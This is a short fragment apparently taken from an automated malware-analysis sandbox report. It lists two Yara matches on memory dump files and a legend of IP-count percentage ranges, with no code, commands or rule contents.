Source: Yara match File source: 00000004.00000003.125766406921.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766059758.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs